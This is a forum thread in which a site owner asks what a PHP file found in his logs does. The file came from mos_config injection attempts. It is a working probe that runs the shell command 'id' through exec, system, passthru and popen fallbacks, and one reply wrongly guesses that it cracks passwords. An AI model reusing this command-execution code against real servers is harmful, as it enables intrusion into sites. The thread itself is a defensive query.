nefar
Friend
I don’t know about anyone else but I have my security set to on with sh404sef.
So today I decided I would actually take a look at my logs and I found 84 mos_config attacks.
There were multiple websites that tried to pass a .txt file in which I will post below. I was just curious if anyone knows what the functions he’s trying to pass actually do.
<?php
echo “Mic22”;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
questbg
Friend
To be honest, I haven’t got a clue what that’s trying to do, I would guess at running some kind of routine to crack the password?
Whatever it is, it scares the hell out of me!
bennitos
Friend
On the site below you will find a good explanation of what it does, and how you can avoid it.
http://www.ivorde.ro/libwwwperl5805_User_agent_bot_visited_my_website-28.html
All the information you need is in there!
This topic contains 4 replies, has 3 voices, and was last updated by 
We moved to new unified forum. Please post all new support queries in our New Forum
